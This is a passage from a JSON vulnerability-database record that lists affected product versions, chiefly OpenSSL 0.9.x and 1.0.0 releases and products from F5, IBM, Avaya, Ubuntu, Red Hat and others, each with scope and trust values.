"0.9.8c" }, { "model": "openssl", "scope": "lte", "trust": 1.0, "vendor": "openssl", "version": "1.0.0e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.5" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.5a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8n" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6b" }, { "model": null, "scope": null, "trust": 0.8, "vendor": "efi", "version": null }, { "model": "project openssl 0.9.8m", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8n", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8o", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.0e" }, { "model": "informix genero", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.32" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "big-ip wom hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "ip deskphone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "96x16.2" }, { "model": "aura system platform", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "6.2.1.0.9" }, { "model": "hardware management console 7r7.7.0", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "project openssl 0.9.8f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "linux enterprise sdk sp1", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "big-ip apm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "informix genero", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.41" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1.1" }, { "model": "big-ip webaccelerator hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.1" }, { "model": "aura system manager", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "11.3" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.10" }, { "model": "enterprise linux es", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "hardware management console 7r7.2.0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "hardware management console 7r7.1.0 sp4", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "8.1-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "ds8870", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "meeting exchange sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "junos space ja1500 appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "sterling connect:enterprise for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip asm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "proactive contact", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.1" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.1" }, { "model": "ip deskphone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "96x16" }, { "model": "aura system platform sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5" }, { "model": "big-ip ltm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.10" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.2" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "voice portal", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.1.3" }, { "model": "big-ip psm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "junos space ja2500 appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "xiv storage system gen3 mtm", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2812-11411.2" }, { "model": "linux enterprise server sp4", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "reflection sp1", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "14.0" }, { "model": "aura communication manager sp4", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux mandrake x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2010.1" }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.1" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "meeting exchange sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "big-ip ltm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.3" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0.0.52" }, { "model": "tivoli netcool/system service monitor fp11", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip webaccelerator hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "8.2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "xiv storage system gen3 mtm 11.1.0.a", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2810-114" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.1" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "tivoli netcool/system service monitor fp12", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.1" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "sterling connect:enterprise for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.44" }, { "model": "esx", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.5" }, { "model": "hardware management console 7r7.1.0 sp3", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.40" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.4" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "project openssl 0.9.8r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "junos space 14.1r1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip ltm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip analytics hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "big-ip link controller hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "8.3-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.4" }, { "model": "tivoli network manager fp7", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.8" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "pfsense", "scope": "ne", "trust": 0.3, "vendor": "bsdperimeter", "version": "2.0.2" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.3" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "big-ip asm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.1" }, { "model": "big-ip ltm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "tivoli netcool/system service monitor fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "junos space 13.1p1.14", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.2.2" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.2" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "meeting exchange sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "project openssl 0.9.8p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "reflection for ibm", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "20070" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.0" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "hardware management console 7r7.3.0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.3" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip gtm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "big-ip ltm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "voice portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "messaging storage server", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.2.14" }, { "model": "project openssl 0.9.8s", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "esxi", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "linux enterprise server sp3 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "big-ip analytics hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5.01" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "voice portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "enterprise linux desktop version", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "linux mandrake x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2011" }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.10" }, { "model": "meeting exchange sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "project openssl 0.9.8q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.4" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.0" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "11.4" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-453" }, { "model": "big-ip ltm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "project openssl 1.0.0f", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "linux lts sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "onboard administrator", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.50" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "tivoli netcool/system service monitor fp10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "onboard administrator", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.55" }, { "model": "big-ip asm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.0" }, { "model": "messaging storage server sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "messaging storage server sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56001" }, { "model": "esxi", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.5" }, { "model": "big-ip psm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "big-ip apm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip psm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5.00" }, { "model": "infosphere balanced warehouse c4000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "big-ip wom hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-ip asm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.4" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.1" }, { "model": "project openssl 0.9.8g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "voice portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "jboss enterprise application platform", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5.1.2" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "big-ip webaccelerator hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "meeting exchange sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "tivoli workload scheduler for applications fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "big-ip asm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "xiv storage system gen3 mtm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2812-11411.1.1" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4" }, { "model": "meeting exchange", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "jboss enterprise web server for solaris", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "1.0.2" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.2" }, { "model": "xiv storage system gen3 mtm", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2810-11411.2" }, { "model": "big-ip wom hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.3" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "tivoli netcool/system service monitor fp13", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "tivoli remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "big-ip edge gateway hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "message networking sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "linux enterprise server for vmware sp1", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "infosphere balanced warehouse d5100", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "enterprise linux ws", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "big-ip psm 